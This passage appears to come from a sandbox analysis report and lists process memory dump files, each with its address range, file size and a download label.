memory/3248-364-0x000001C3A5600000-0x000001C3A56B0000-memory.dmp

Filesize
704KB

Download
memory/3248-365-0x000001C3A5060000-0x000001C3A507C000-memory.dmp

Filesize
112KB

Download
memory/4196-255-0x000001DA52D90000-0x000001DA52DA2000-memory.dmp

Filesize
72KB

Download
memory/4196-256-0x000001DA6B610000-0x000001DA6B64C000-memory.dmp

Filesize
240KB

Download
memory/4196-251-0x000001DA6B870000-0x000001DA6B908000-memory.dmp

Filesize
608KB

Download
memory/4196-239-0x000001DA511E0000-0x000001DA51208000-memory.dmp

Filesize
160KB

Download
memory/5728-130-0x0000000005290000-0x00000000052BE000-memory.dmp

Filesize
184KB

Download
memory/5728-134-0x0000000005280000-0x000000000528C000-memory.dmp

Filesize
48KB

Download
memory/5884-291-0x0000021226D30000-0x0000021226DE2000-memory.dmp

Filesize
712KB

Download
memory/5884-296-0x0000021226CB0000-0x0000021226CD2000-memory.dmp

Filesize
136KB

Download
memory/5884-339-0x0000021227290000-0x00000212272C8000-memory.dmp

Filesize
224KB

Download
memory/5884-368-0x0000021226C70000-0x0000021226C86000-memory.dmp

Filesize
88KB

Download
memory/5892-170-0x0000000002C70000-0x0000000002C92000-memory.dmp

Filesize
136KB

Download
memory/5892-167-0x00000000050C0000-0x0000000005172000-memory.dmp

Filesize
712KB

Download
memory/5892-171-0x0000000005180000-0x00000000054D4000-memory.dmp

Filesize
3.3MB

Download
memory/6104-201-0x0000000002AC0000-0x0000000002B26000-memory.dmp

Filesize
408KB

Download